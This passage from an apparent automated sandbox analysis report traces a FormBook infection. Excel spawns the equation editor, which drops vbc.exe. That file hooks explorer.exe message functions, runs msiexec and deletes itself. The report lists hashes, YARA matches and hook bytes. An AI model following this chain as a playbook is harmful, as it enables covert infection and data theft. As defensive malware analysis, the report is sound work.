                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: USER32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEB
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEB
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEB
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEB

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:14:03:15
                                          Start date:27/09/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                          Imagebase:0x13faf0000
                                          File size:28253536 bytes
                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:14:03:35
                                          Start date:27/09/2021
                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                          Imagebase:0x400000
                                          File size:543304 bytes
                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:14:03:41
                                          Start date:27/09/2021
                                          Path:C:\Users\Public\vbc.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\Public\vbc.exe'
                                          Imagebase:0x1000000
                                          File size:685568 bytes
                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Antivirus matches:
                                          • Detection: 13%, ReversingLabs
                                          Reputation:low

                                          General

                                          Start time:14:03:45
                                          Start date:27/09/2021
                                          Path:C:\Users\Public\vbc.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\Public\vbc.exe
                                          Imagebase:0x1000000
                                          File size:685568 bytes
                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:14:03:46
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0xffa10000
                                          File size:3229696 bytes
                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:14:04:03
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\SysWOW64\autofmt.exe
                                          Imagebase:0xab0000
                                          File size:658944 bytes
                                          MD5 hash:A475B7BB0CCCFD848AA26075E81D7888
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:14:04:03
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                                          Imagebase:0xa30000
                                          File size:73216 bytes
                                          MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:14:04:06
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                          Imagebase:0x4acb0000
                                          File size:302592 bytes
                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >